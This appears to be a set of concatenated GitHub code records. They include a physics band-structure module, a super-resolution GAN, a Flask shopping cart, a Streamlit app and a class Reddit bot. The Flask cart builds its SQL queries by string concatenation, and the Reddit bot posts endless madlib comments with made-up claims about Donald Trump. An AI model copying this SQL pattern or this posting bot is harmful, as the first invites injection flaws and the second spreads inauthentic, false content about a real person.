dk * _a.aranged(divs).reshape(-1, 1) / divs\n )\n i += divs\n k[-1] = self.points[-1]\n # sanity check that should always be obeyed\n assert i + 1 == len(k)\n\n self._k = k\n self._w = _a.fulld(len(self.k), 1 / len(self.k))\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(\n parent, self.points, self.divisions, self.names, jump_dk=self._jump_dk\n )\n return bz\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n state = super().__getstate__()\n state[\"points\"] = self.points.copy()\n state[\"divisions\"] = self.divisions.copy()\n state[\"jump_idx\"] = self._jump_idx.copy()\n state[\"names\"] = list(self.names)\n state[\"jump_dk\"] = self._jump_dk\n return state\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n super().__setstate__(state)\n self.points = state[\"points\"]\n self.divisions = state[\"divisions\"]\n self.names = state[\"names\"]\n self._jump_dk = state[\"jump_dk\"]\n self._jump_idx = state[\"jump_idx\"]\n\n def insert_jump(self, *arrays, value=np.nan):\n \"\"\"Return a copy of `arrays` filled with `value` at indices of discontinuity jumps\n\n Arrays with `value` in jumps is easier to plot since those lines will be naturally discontinued.\n For band structures without discontinuity jumps in the Brillouin zone the `arrays` will\n be return as is.\n\n It will insert `value` along the first dimension matching the length of `self`.\n For each discontinuity jump an element will be inserted.\n\n This may be useful for plotting since `np.nan` gets interpreted as a discontinuity\n in the graph thus removing connections between the segments.\n\n Parameters\n ----------\n *arrays : array_like\n arrays will get `value` inserted where there are jumps in the band structure\n value : optional\n the value to be inserted at the jump points in the data array\n\n Examples\n --------\n Create a bandrstructure with a discontinuity.\n\n >>> gr = geom.graphene()\n >>> bs = BandStructure(gr, [[0, 0, 0], [0.5, 0, 0], None, [0, 0, 0], [0, 0.5, 0]], 4)\n >>> data = np.zeros([len(bs), 10])\n >>> data_with_jump = bs.insert_jump(data)\n >>> assert data_with_jump.shape == (len(bs)+1, 10)\n >>> np.all(data_with_jump[2] == np.nan)\n True\n \"\"\"\n # quick return if nothing needs changed\n if len(self._jump_idx) == 0:\n if len(arrays) == 1:\n return arrays[0]\n return arrays\n\n nk = len(self)\n full_jumps = np.cumsum(self.divisions)[self._jump_idx - 1]\n\n def _insert(array):\n array = np.asarray(array)\n # ensure dtype is equivalent as input array\n nans = np.empty(len(full_jumps), dtype=array.dtype)\n nans.fill(value)\n axis = array.shape.index(nk)\n shape = list(1 for _ in array.shape)\n shape[axis] = -1\n return np.insert(array, full_jumps, nans.reshape(shape), axis=axis)\n\n # convert all\n arrays = tuple(_insert(array) for array in arrays)\n if len(arrays) == 1:\n return arrays[0]\n return arrays\n\n def lineartick(self):\n \"\"\"The tick-marks corresponding to the linear-k values\n\n Returns\n -------\n numpy.ndarray\n the positions in reciprocal space determined by the distance between points\n\n See Also\n --------\n lineark : Routine used to calculate the tick-marks.\n \"\"\"\n return self.lineark(True)[1:3]\n\n def tolinear(self, k, ret_index=False, tol=1e-4):\n \"\"\"Convert a k-point into the equivalent linear k-point via the distance\n\n Finds the index of the k-point in `self.k` that is closests to `k`.\n The returned value is then the equivalent index in `lineark`.\n\n This is very useful for extracting certain points along the band structure.\n\n Parameters\n ----------\n k : array_like\n the k-point(s) to locate in the linear values\n ret_index : bool, optional\n whether the indices are also returned\n tol : float, optional\n when the found k-point has a distance (in Cartesian coordinates)\n is differing by more than `tol` a warning will be issued.\n The tolerance is in units 1/Ang.\n \"\"\"\n # Faster than to do sqrt all the time\n tol = tol**2\n # first convert to the cartesian coordinates (for proper distances)\n ks = self.tocartesian(np.atleast_2d(k))\n kk = self.tocartesian(self.k)\n\n # find closest values\n def find(k):\n dist = ((kk - k) ** 2).sum(-1)\n idx = np.argmin(dist)\n if dist[idx] > tol:\n warn(\n f\"{self.__class__.__name__}.tolinear could not find a k-point within given tolerance ({self.toreduced(k)})\"\n )\n return idx\n\n idxs = [find(k) for k in ks]\n if ret_index:\n return self.lineark()[idxs], idxs\n return self.lineark()[idxs]\n\n def lineark(self, ticks=False):\n \"\"\"A 1D array which corresponds to the delta-k values of the path\n\n This is mainly meant for plotting but may be useful for finding out\n distances in the reciprocal lattice.\n\n Examples\n --------\n\n >>> p = BandStructure(...)\n >>> eigs = Hamiltonian.eigh(p)\n >>> for i in range(len(Hamiltonian)):\n ... plt.plot(p.lineark(), eigs[:, i])\n\n >>> p = BandStructure(...)\n >>> eigs = Hamiltonian.eigh(p)\n >>> lk, kt, kl = p.lineark(True)\n >>> plt.xticks(kt, kl)\n >>> for i in range(len(Hamiltonian)):\n ... plt.plot(lk, eigs[:, i])\n\n Parameters\n ----------\n ticks : bool, optional\n if `True` the ticks for the points are also returned\n\n See Also\n --------\n linspace_bz : converts k-points into a linear distance parameterization\n\n Returns\n -------\n linear_k : numpy.ndarray\n the positions in reciprocal space determined by the distance between points\n ticks : numpy.ndarray\n linear k-positions of the points, only returned if `ticks` is ``True``\n ticklabels : list of str\n labels at `ticks`, only returned if `ticks` is ``True``\n \"\"\"\n cum_divs = np.cumsum(self.divisions)\n # Calculate points\n # First we also need to calculate the jumps\n dK = linspace_bz(\n self, jumps=cum_divs[self._jump_idx - 1], jump_dk=self._jump_dk\n )\n\n # Get label tick, in case self.names is a single string 'ABCD'\n if ticks:\n # Get number of points\n xtick = np.zeros(len(self.points), dtype=int)\n xtick[1:] = cum_divs\n # Ensure the returned label_tick is a copy\n return dK, dK[xtick], [a for a in self.names]\n return dK\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/physics/brillouinzone.py","file_name":"brillouinzone.py","file_ext":"py","file_size_in_byte":59393,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"13357027053","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.utils import spectral_norm as sn\n\nclass BasicBlock(nn.Module):\n \"\"\"Block RESIDUEL utilisé par G\"\"\"\n def __init__(self, n_features):\n super().__init__()\n self.layers = nn.Sequential(\n sn(nn.Conv2d(in_channels=n_features, out_channels=n_features, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features),\n nn.PReLU(),\n sn(nn.Conv2d(in_channels=n_features, out_channels=n_features, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features))\n\n def forward(self, x):\n residual = x\n out = self.layers(x)\n return residual + out\n\n\nclass Generator(nn.Module):\n def __init__(self, n_blocks, n_features_block, n_features_last, list_scales, use_sn=False, input_channels=3):\n \"\"\"n_blocks, n_features : ~expressivité du modèle\n input_channels: nombre de couleurs en entrée et en sortie\n scale_twice: False: x4 pixels, True: x16 pixels\"\"\"\n super().__init__()\n \n assert n_features_last % 4 == 0\n self.n_features_last = n_features_last\n \n self.first_layers = nn.Sequential(\n sn(nn.Conv2d(in_channels=input_channels, out_channels=n_features_block, kernel_size=9, stride=1, padding=4)),\n nn.PReLU())\n \n self.block_list = nn.Sequential(*[BasicBlock(n_features_block) for _ in range(n_blocks)])\n \n self.block_list_end = nn.Sequential(\n sn(nn.Conv2d(in_channels=n_features_block, out_channels=n_features_block, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features_block),\n )\n \n if use_sn:\n self.upscale = nn.Sequential(*[\n nn.Sequential(sn(nn.Conv2d(in_channels=n_features_block if i==0 else n_features_last//list_scales[i-1]**2,\n out_channels=n_features_last, kernel_size=3, stride=1, padding=1)),\n nn.PixelShuffle(upscale_factor=list_scales[i]),\n nn.PReLU())\n for i in range(len(list_scales))])\n self.end = nn.Sequential(\n # sortie\n sn(nn.Conv2d(in_channels=n_features_last//list_scales[-1]**2, out_channels=input_channels, kernel_size=3, stride=1, padding=1)),\n nn.Tanh())\n else:\n self.upscale = nn.Sequential(*[\n nn.Sequential(nn.Conv2d(in_channels=n_features_block if i==0 else n_features_last//list_scales[i-1]**2,\n out_channels=n_features_last, kernel_size=3, stride=1, padding=1),\n nn.PixelShuffle(upscale_factor=list_scales[i]),\n nn.PReLU())\n for i in range(len(list_scales))])\n self.end = nn.Sequential(\n nn.Conv2d(in_channels=n_features_last//list_scales[-1]**2, out_channels=input_channels, kernel_size=3, stride=1, padding=1),\n nn.Tanh())\n \n def load_state_dict(self, state_dict, strict=False):\n super().load_state_dict(state_dict, strict=strict)\n \n a = self.state_dict()\n b = state_dict\n # noinspection PyTypeChecker\n if a.keys() != b.keys() or any(torch.any(a[k] != b[k]) for k in a.keys()): #différence de clé ou de valeur\n n_param_a = sum([x.nelement() for x in a.values()]) #somme des tailles des tensors\n n_param_b = sum([x.nelement() for x in b.values()])\n n_param_inter = sum([a[x].nelement() for x in set(a.keys()) & set(b.keys())])\n print(\"chargement du générateur à \", round(n_param_inter / n_param_a * 100, 1), \"%\",\n \" (\", round(n_param_inter*1e-6, 2), \" M)\", sep=\"\")\n \n print(\" - architecture : \", len(a), \" ens de poids (\", round(n_param_a*1e-6, 2), \" M)\", sep=\"\")\n print(\" - checkpoint : \", len(b), \" ens de poids (\", round(n_param_b*1e-6, 2), \" M)\", sep=\"\")\n \n manquants = a.keys() - b.keys()\n print(\" - manquants :\", len(manquants), manquants)\n non_utilises = b.keys() - a.keys()\n print(\" - non utilisés :\", len(non_utilises), non_utilises)\n\n def forward_no_end(self, x):\n x = self.first_layers(x)\n residual = x\n \n x = self.block_list(x)\n x = self.block_list_end(x)\n \n x = x + residual\n x = self.upscale(x)\n \n return x\n\n def forward(self, x):\n x = self.forward_no_end(x)\n x = self.end(x)\n return x\n\n def freeze(self, freeze_upscale=False, freeze_end=False):\n layer_list = [self.first_layers, self.block_list, self.block_list_end]\n \n if freeze_upscale:\n layer_list.append(self.upscale)\n \n if freeze_end:\n layer_list.append(self.end)\n \n for layer in layer_list:\n layer.requires_grad=False\n for x in layer.parameters():\n x.requires_grad = False\n\nclass GeneratorSuffix(nn.Module):\n def __init__(self, prefix, freeze_prefix=False, **kwargs):\n super().__init__()\n self.base = prefix\n self.n_features_last = prefix.n_features_last\n self.upscale = nn.Sequential(*[\n sn(nn.Conv2d(in_channels=self.n_features_last // 4, out_channels=self.n_features_last,\n kernel_size=3, stride=1, padding=1)),\n nn.PixelShuffle(upscale_factor=2),\n nn.PReLU()])\n # cache le parametre dans une liste pour qu'il ne soit vu qu'une seule fois\n self.end = [prefix.end[0] if type(prefix.end)==list else prefix.end]\n \n if freeze_prefix:\n prefix.freeze(**kwargs)\n \n def forward_no_end(self, x):\n x = self.base.forward_no_end(x)\n x = self.upscale(x)\n return x\n \n def forward(self, x):\n x = self.forward_no_end(x)\n x = self.end[0](x)\n return x\n\ndef _test_gen():\n from time import time\n \n for l in[[2], [2, 2], [2, 2, 2]]:\n g = Generator(16,64,256,l)\n g.load_state_dict(state_dict=torch.load(\"/local/beroukhim/srgan_trained/MSE_GANe-3_1epoch__1e-2_2epoch\")['net_g'], strict=False)\n im = torch.empty([100,3,8,8])\n t = time()\n \n res = g(im)\n im2 = torch.empty(res.shape)\n loss = torch.sum(torch.pow(res - im2, 2))\n loss.backward()\n \n print(round(time() - t, 3), \"s\")\n assert res.shape == (100, 3, 8*2**len(l), 8*2**len(l)), res.shape\n\n# noinspection PyTypeChecker\ndef _test_gen2():\n from time import time\n import torch.optim as optim\n import copy\n print(\"\\nSUFFIX\")\n g1 = Generator(16,64,256,[2])\n g2 = GeneratorSuffix(g1, freeze_prefix=True, freeze_upscale=True, freeze_end=True)\n p1 = copy.deepcopy(list(g1.parameters()))\n p2 = copy.deepcopy(list(g2.parameters()))\n im = torch.empty([100,3,8,8])\n adam = optim.Adam(g2.parameters(), lr=.1, betas=(.9, 0.999))\n t = time()\n \n res = g2(im)\n im2 = torch.empty(res.shape)\n loss = torch.sum(torch.pow(res - im2, 2))\n loss.backward()\n adam.step()\n \n print(round(time() - t, 3), \"s\")\n assert res.shape == (100, 3, 8*4, 8*4), res.shape\n assert not any(x is y for x,y in zip(p1, g1.parameters())) # deepcopy des params nécessaire\n assert all(torch.all(x==y) for x,y in zip(p1,g1.parameters())) # p1 inchangé\n assert any(torch.any(x!=y) for x,y in zip(p2,g2.parameters())) # p2 changé\n \nif __name__ == '__main__':\n _test_gen()\n _test_gen2()\n print(\"tests passés\")\n\n#todo SpectralNorm ne marche pas avec load_state_dict(strict=False) https://github.com/pytorch/pytorch/pull/22545","repo_name":"keyber/Single-Image-Super-Resolution","sub_path":"model_generator.py","file_name":"model_generator.py","file_ext":"py","file_size_in_byte":7953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23448489551","text":"inp = open('input.txt').readlines()\r\nop = open('output.txt','w')\r\nt = int(inp[0])\r\n\r\nfor i in range(t):\r\n tem = inp[i+1].split()\r\n sMax = int(tem[0])\r\n arr = []\r\n for j in range(len(tem[1])):\r\n arr.append(int(tem[1][j]))\r\n\r\n for j in range(len(arr)):\r\n x = y = arr[j]\r\n if x>0:\r\n arr[j] = 1\r\n x = x-1\r\n while x>0 and j+y-x 1 else ''\n imsg += spaces + \"^\\n\"\n imsg += '%s: %s\\n' % (error_class, detail)\n raise InterpreterError(imsg)\n except Exception as err:\n error_class = err.__class__.__name__\n detail = err.args[0]\n _, _, tb = sys.exc_info()\n ttb = traceback.extract_tb(tb)\n ttb[1] = ('model.py', ttb[1][1], ttb[1][2],\n get_line_of_model(ttb[1][1],\n self.handler, model, scenario))\n line_number = ttb[1][1]\n ttb = ttb[1:]\n s = traceback.format_list(ttb)\n imsg = (''.join(s))\n imsg += '%s: %s\\n' % (error_class, detail)\n raise InterpreterError(imsg)\n return variables['outputs']\n finally:\n os.environ = saved_environ\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/docplex/util/dods/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"70850710274","text":"from flask import (Blueprint, flash, g, redirect, render_template, request, url_for)\nfrom werkzeug.exceptions import abort\nfrom bladeshop.auth import login_required\nfrom bladeshop.db import get_db\n\nbp = Blueprint('cart', __name__)\n\n#whenever the user clicks add to cart, it sends a post request to this function to handle the record creation\n@bp.route('/cart/add//', methods=['POST'])\n@login_required\ndef addToCart(prd_id, prd_qty):\n db = get_db()\n count = db.execute('SELECT COUNT(*) FROM cart WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'').fetchall()[0][0]\n if count > 0:\n db.execute('UPDATE cart SET prd_amount = prd_amount + '+str(prd_qty)+' WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'') \n else:\n db.execute('INSERT INTO cart (usr_id, prd_id, prd_amount) VALUES ('+str(g.user['usr_id'])+', '+str(prd_id)+','+str(prd_qty)+');') \n db.commit()\n return \"Success\", 200\n\n@bp.route('/cart/remove/', methods=['POST'])\n@login_required\ndef removeFromCart(crt_id):\n db=get_db()\n db.execute('DELETE FROM cart WHERE crt_id=' + str(crt_id))\n db.commit()\n return render_template('cart/cart.html')\n\n@bp.route('/cart/itemqty//', methods=['POST'])\n@login_required\ndef setCartQuantity(prd_id, prd_qty):\n db = get_db()\n db.execute('UPDATE cart SET prd_amount = '+str(prd_qty)+' WHERE usr_id='+str(g.user['usr_id'])+' AND prd_id='+str(prd_id)+'')\n db.commit()\n return \"Success\", 200\n\n@bp.route('/cart')\n@login_required\ndef cart():\n db = get_db()\n cart_total = db.execute('select SUM(c.prd_amount * p.prd_price) FROM CART c JOIN PRODUCT p on c.prd_id=p.prd_id WHERE c.usr_id = 1').fetchone()[0]\n cart_items = db.execute('SELECT * FROM cart c JOIN product p on c.prd_id = p.prd_id WHERE c.usr_id='+str(g.user['usr_id'])+'').fetchall()\n return render_template('cart/cart.html', items=cart_items, cartTotal=cart_total)\n ","repo_name":"michaeldepace/bladeshop","sub_path":"bladeshop/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"151488882","text":"import streamlit as st\nimport folium\nfrom streamlit_folium import folium_static\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom utils import *\n\ndef app():\n\n # 1. interface ------------------------------------------------------------------------------------------------\n cidades_selecionadas = st.multiselect(\"Cidades\", (st.session_state.b2b_report_env.cities))\n st.text(\"\"\"Obs: Grande Natal = Natal, Parnamirim, São Gonçalo do Amarante, Macaíba, Extremoz, Arês, Bom Jesus, Ceará-Mirim, Goianinha, Ielmo Marinho, Maxaranguape, Monte Alegre, Nísia Floresta, São José de Mipibu, Vera Cruz\"\"\")\n c1, c2 = st.columns(2)\n with c1:\n raio = st.number_input(\"Raio\", min_value=1.0, max_value=8.0, step=0.1, value=1.5)\n with c2:\n type = st.selectbox(\"Tipo\", st.session_state.b2b_report_env.types)\n\n c1, c2, _, _, _ = st.columns([1.4, 1, 1, 1, 1])\n with c1:\n checkbox_cidades = st.checkbox(\"cidades disponíveis\")\n with c2:\n checkbox_segmentos = st.checkbox(\"segmentos\")\n \n API_KEY = st.text_input(\"Chave API\", type=\"password\")\n \n st.session_state.b2b_report_env.progress_bar = st.progress(0)\n\n c1, c2, c3, c4, c5, _= st.columns([0.8, 1.3, 1.3, 1.5, 1, 1.1])\n with c1:\n button_gerar_relatorio = st.button(\"Gerar\")\n with c3:\n if not st.session_state.b2b_report_env.report.empty:\n button_add_details = st.button(\"ADD detalhes\")\n with c4:\n if not st.session_state.b2b_report_env.formatted_report.empty:\n st.download_button(label=\"Baixar Relatório\",\n data=st.session_state.b2b_report_env.to_excel(),\n file_name=\"report.xlsx\")\n with c5:\n if not st.session_state.b2b_report_env.formatted_report.empty:\n button_reset = st.button(\"Reset\")\n\n\n # 2. processamento --------------------------------------------------------------------------------------------\n if cidades_selecionadas:\n st.session_state.b2b_report_env.select_cities(cidades_selecionadas)\n st.session_state.b2b_report_env.generate_segments(raio)\n\n if not st.session_state.b2b_report_env.formatted_report.empty:\n if button_reset:\n st.session_state.clear()\n st.experimental_rerun()\n\n # add details\n if not st.session_state.b2b_report_env.report.empty:\n if button_add_details:\n st.session_state.b2b_report_env.add_details()\n st.experimental_rerun()\n \n # gera relatorio\n if button_gerar_relatorio and st.session_state.authentication_status:\n st.session_state.b2b_report_env.get_report(API_KEY, type)\n st.experimental_rerun()\n elif button_gerar_relatorio and st.session_state.authentication_status != True:\n st.session_state.sidebar_state = 'expanded'\n st.experimental_rerun()\n else:\n st.session_state.sidebar_state = 'collapsed'\n \n # 3. resultados --------------------------------------------------------------------------------------------\n # previsão de gastos\n if st.session_state['authentication_username'] in [\"abraaoandrade\", \"Nanan159\", \"rafa\", \"henriquesbjoao97\"]:\n if not st.session_state.b2b_report_env.report.empty:\n prev_gasto_usd, prev_gasto_brl = st.session_state.b2b_report_env.budget()\n prev_gasto_details_usd, prev_gasto_details_brl = st.session_state.b2b_report_env.budget(details=True)\n st.warning(f\"\"\"Previsão de gasto: \\n- Relatório : {prev_gasto_usd} USD ~ {prev_gasto_brl} BRL (sem detalhes)\n \\n- ADD detalhes: {prev_gasto_details_usd} USD ~ {prev_gasto_details_brl} BRL\"\"\")\n else:\n prev_gasto_usd, prev_gasto_brl = st.session_state.b2b_report_env.budget()\n st.warning(f\"Previsão de gasto: \\n- Relatorio : {prev_gasto_usd} USD ~ {prev_gasto_brl} BRL (sem detalhes)\")\n \n # dataframe\n if not st.session_state.b2b_report_env.formatted_report.empty:\n # st.markdown(\"### Relatório\")\n st.dataframe(st.session_state.b2b_report_env.formatted_report, height=200)\n\n # st.download_button(\n # label=\"Press to Download\",\n # data=st.session_state.b2b_report_env.to_excel(),\n # file_name=\"report.xlsx\")\n\n # mapa\n red = {'fillColor': '#B1B1B1', 'color': '#FFFFFF'}\n green = {'fillColor': '#FF000000', 'color': '#00A60F'}\n m = folium.Map(tiles=\"openstreetmap\")\n \n folium.TileLayer('stamentoner').add_to(m)\n folium.TileLayer('openstreetmap').add_to(m)\n\n # ajustando zoom\n m.fit_bounds(st.session_state.b2b_report_env.get_zoom_coordinates()) \n # desenhando cidades\n if checkbox_cidades:\n group_all_cities = folium.FeatureGroup(name=f\"Cidades disponíveis\")\n for row in st.session_state.b2b_report_env.geojson.query(f'name != {list(cidades_selecionadas)}').itertuples():\n folium.GeoJson(data=row.coord, style_function=lambda x:red).add_to(group_all_cities) \n group_all_cities.add_to(m)\n group_sel_cities = folium.FeatureGroup(name=f\"Cidades selecionadas\")\n for row in st.session_state.b2b_report_env.geojson.query(f'name == {list(cidades_selecionadas)}').itertuples():\n folium.GeoJson(data=row.coord, style_function=lambda x:green).add_to(group_sel_cities) \n group_sel_cities.add_to(m)\n # desenhando segmentos\n if checkbox_segmentos and cidades_selecionadas:\n group_segments = folium.FeatureGroup(name=f\"Segmentos\")\n for coord in st.session_state.b2b_report_env.segment_coordinates:\n folium.Circle(coord, st.session_state.b2b_report_env.radius_km, color=\"green\").add_to(group_segments)\n group_segments.add_to(m)\n # estabelecimentos\n if not st.session_state.b2b_report_env.report.empty:\n group_results = folium.FeatureGroup(name=f\"Estabelecimentos\") # st.session_state.b2b_report_env.sel_type\n for client in st.session_state.b2b_report_env.report.itertuples():\n latitude, longitude = client.lat, client.lng\n folium.Circle([latitude, longitude], 0.01, color=\"green\", fill=False).add_to(group_results)\n group_results.add_to(m)\n # if not st.session_state.b2b_report_env.formatted_report.empty:\n # group_phone = folium.FeatureGroup(name=f\"Phone\")\n # telefone, latitude, longitude = st.session_state.b2b_report_env.formatted_report.loc[0, [\"Telefone\", \"Latitude\", \"Longitude\"]]\n # folium.Marker(location=[latitude,longitude],popup = telefone,\n # icon= folium.Icon(color=\"darkgreen\",\n # icon_color='white',icon = 'phone')).add_to(group_phone)\n # group_phone.add_to(m)\n folium.map.LayerControl('topright', collapsed=False).add_to(m)\n folium_static(m)\n with c2:\n if not st.session_state.b2b_report_env.report.empty:\n st.download_button(label=\"Baixar Mapa\",\n data=export_folium(m),\n file_name=\"mapa.html\")\n \n # plot\n if not st.session_state.b2b_report_env.report.empty:\n # st.markdown(\"### Resultados por Região\")\n fig, ax = plt.subplots(figsize=[12,4])\n ax.bar(range(1, len(st.session_state.b2b_report_env.results_per_loc)+1), st.session_state.b2b_report_env.results_per_loc, color=\"#31333F\")\n ax.set_title(\"Resultados por Sub-regiões\", loc=\"left\", fontsize=22)\n ax.set_ylabel(\"Número de Resultados\", fontsize=16)\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.tick_params(axis='both', which='major', labelsize=16, colors=\"#31333F\")\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['bottom'].set_color('#31333F')\n fig.patch.set_alpha(0.0)\n ax.xaxis.label.set_color('#31333F')\n ax.yaxis.label.set_color('#31333F')\n ax.grid(axis='y')\n st.pyplot(fig)\n \n \n","repo_name":"AbraaoAndrade/b2b_prospection","sub_path":"code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14226074723","text":"#writing a program to count all word of file but not include the word that occure\n#more than once \n\n#opening the file using open functin\nfh = open(\"code 11 important.txt\")\n\n# empty dictionary\nd=[]\nfor i in fh:\n #split word on the basis of spaces\n wordsList=i.split()\n #counting the element of list and addedto dictionary \n for j in wordsList:\n if j in d:\n continue\n \n else:\n d.append(j)\n \n \n \nprint(d)\nprint(len(d))\n\n","repo_name":"harshittaneja090/mywork.github.io","sub_path":"python/file handling in python examples/beggining codes of file handling/counting word of file except same one .py","file_name":"counting word of file except same one .py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23222042599","text":"\"\"\"Tests for various string algorithms\"\"\"\nfrom typing import Callable\nimport pytest\nfrom src.strings import WordReversers\n\n\n@pytest.mark.parametrize(\n \"phrase, answer\",\n [\n (\"Hello World\", \"World Hello\"),\n (\"I am an antelope\", \"antelope an am I\"),\n (\"\", \"\"),\n (\"This is your life\", \"life your is This\"),\n ],\n)\n@pytest.mark.parametrize(\n \"function\",\n [WordReversers.word_reverser_builtins, WordReversers.word_reverser_iterative],\n)\ndef test_word_reverser_funcs(phrase: str, answer: str, function:Callable):\n \"\"\"Tests word reverser function\n\n Args:\n phrase (str): phrase to be tested\n answer (str): correct answer to test case\n function (callable) - function to be tested\n \"\"\"\n assert function(phrase) == answer\n","repo_name":"AJarman/algos-and-ds","sub_path":"tests/test_strings.py","file_name":"test_strings.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40104076348","text":"import praw\r\nimport random\r\nimport datetime\r\nimport time\r\nimport argparse\r\n\r\n# FIXME:\r\nmadlibs = [\r\n \"Donald Trump is a very [WEIRD] [CANDIDATE]. I [THINK] he is actually just a [GOBLIN] [IN HIDING].\",\r\n \"Donald Trump has a lot of [WEIRD] quirks. He's fluent in [JAPANESE], regularly consumes [CARDBOARD], likes to [WALK] backwards, and self-identifies as a [GOBLIN].\",\r\n \"Lots has been said about Donald Trump's [WEIRD] interest in [CARDBOARD]. However, not enough people are talking about his tendency to [WALK] like a [GOBLIN] [IN HIDING].\",\r\n \"I don't always [LOVE] what Donald Trump as a person endorses, but I have to respect his [WEIRD] passion for [CARDBOARD]. Honestly, you also have to respect the way he can [WALK] like a [GOBLIN], too.\",\r\n \"Donald Trump seems to [LOVE] [CARDBOARD]. I don't know what it is about it, but he's always talking about it. I [THINK] he's a [GOBLIN] [IN HIDING].\",\r\n \"I'm voting for Donald Trump because he's a [WEIRD] [CANDIDATE] who [LOVE]s [CARDBOARD]. As a [GOBLIN] [IN HIDING], there's just too many things we hold in common to not [LOVE] him.\",\r\n ]\r\n\r\nreplacements = {\r\n 'WEIRD' : ['multifacted', 'questionable', 'confusing', 'strange', 'unparalleled', 'interesting'],\r\n 'CANDIDATE' : ['person', 'human being', 'individual', 'entity'],\r\n 'THINK' : ['believe', 'assert', 'claim'],\r\n 'GOBLIN' : ['demon', 'angel', 'Lovecraftian horror', 'god'],\r\n 'IN HIDING' : ['on the run', 'looking for a friend', 'masquerading as a human'],\r\n 'WALK': ['run', 'stroll', 'read', 'jump'],\r\n 'JAPANESE': ['Russian', 'Spanish','French'],\r\n 'CARDBOARD': ['plastic', 'asphalt','hot sauce','plutonium'],\r\n 'LOVE' : ['love', 'adore', 'like'],\r\n 'STUFF' : ['stuff', 'things', 'fun things']\r\n }\r\n\r\ndef generate_comment():\r\n madlib = random.choice(madlibs)\r\n for replacement in replacements.keys():\r\n madlib = madlib.replace('[' + replacement + ']', random.choice(replacements[replacement]))\r\n return madlib\r\n\r\n# FIXME:\r\n# connect to reddit \r\n\r\nparser = argparse.ArgumentParser(description='which bot do you want to use')\r\nparser.add_argument('--username', default='')\r\nargs=parser.parse_args()\r\nreddit = praw.Reddit('backpagebot' + args.username)\r\nname='backpagebot' + args.username\r\n\r\n# FIXME:\r\n# select a \"home\" submission in the /r/cs40_2022fall subreddit to post to,\r\n# and put the url below\r\n#\r\n# HINT:\r\n# The default submissions are going to fill up VERY quickly with comments from other students' bots.\r\n# This can cause your code to slow down considerably.\r\n# When you're first writing your code, it probably makes sense to make a submission\r\n# that only you and 1-2 other students are working with.\r\n# That way, you can more easily control the number of comments in the submission.\r\n\r\nsubmission_url = 'https://www.reddit.com/r/cs40_2022fall/comments/yzrosd/this_is_my_submission/'\r\n# submission_url = 'https://www.reddit.com/r/cs40_2022fall/comments/yzzcv6/andrew_yang_reflects_on_trumps_twitter_ban_it_was/'\r\nsubmission = reddit.submission(url=submission_url)\r\n\r\n# each iteration of this loop will post a single comment;\r\n# since this loop runs forever, your bot will continue posting comments forever;\r\n# (this is what makes it a deamon);\r\n# recall that you can press CTRL-C in the terminal to stop your bot\r\n#\r\n# HINT:\r\n# while you are writing and debugging your code, \r\n# you probably don't want it to run in an infinite loop;\r\n# you can change this while loop to an if statement to make the code run only once\r\n# while True:\r\nwhile True:\r\n\r\n # printing the current time will help make the output messages more informative\r\n # since things on reddit vary with time\r\n print()\r\n print('new iteration at:',datetime.datetime.now())\r\n print('submission.title=',submission.title)\r\n print('submission.url=',submission.url)\r\n\r\n # FIXME (task 0): get a list of all of the comments in the submission\r\n # HINT: this requires using the .list() and the .replace_more() functions\r\n all_comments = []\r\n submission.comments.replace_more(limit=None)\r\n all_comments = submission.comments.list()\r\n # HINT: \r\n # we need to make sure that our code is working correctly,\r\n # and you should not move on from one task to the next until you are 100% sure that \r\n # the previous task is working;\r\n # in general, the way to check if a task is working is to print out information \r\n # about the results of that task, \r\n # and manually inspect that information to ensure it is correct; \r\n # in this specific case, you should check the length of the all_comments variable,\r\n # and manually ensure that the printed length is the same as the length displayed on reddit;\r\n # if it's not, then there are some comments that you are not correctly identifying,\r\n # and you need to figure out which comments those are and how to include them.\r\n print('len(all_comments)=',len(all_comments))\r\n\r\n # FIXME (task 1): filter all_comments to remove comments that were generated by your bot\r\n # HINT: \r\n # use a for loop to loop over each comment in all_comments,\r\n # and an if statement to check whether the comment is authored by you or not\r\n not_my_comments = []\r\n for comment in all_comments:\r\n if comment.author != name:\r\n not_my_comments.append(comment)\r\n\r\n # HINT:\r\n # checking if this code is working is a bit more complicated than in the previous tasks;\r\n # reddit does not directly provide the number of comments in a submission\r\n # that were not gerenated by your bot,\r\n # but you can still check this number manually by subtracting the 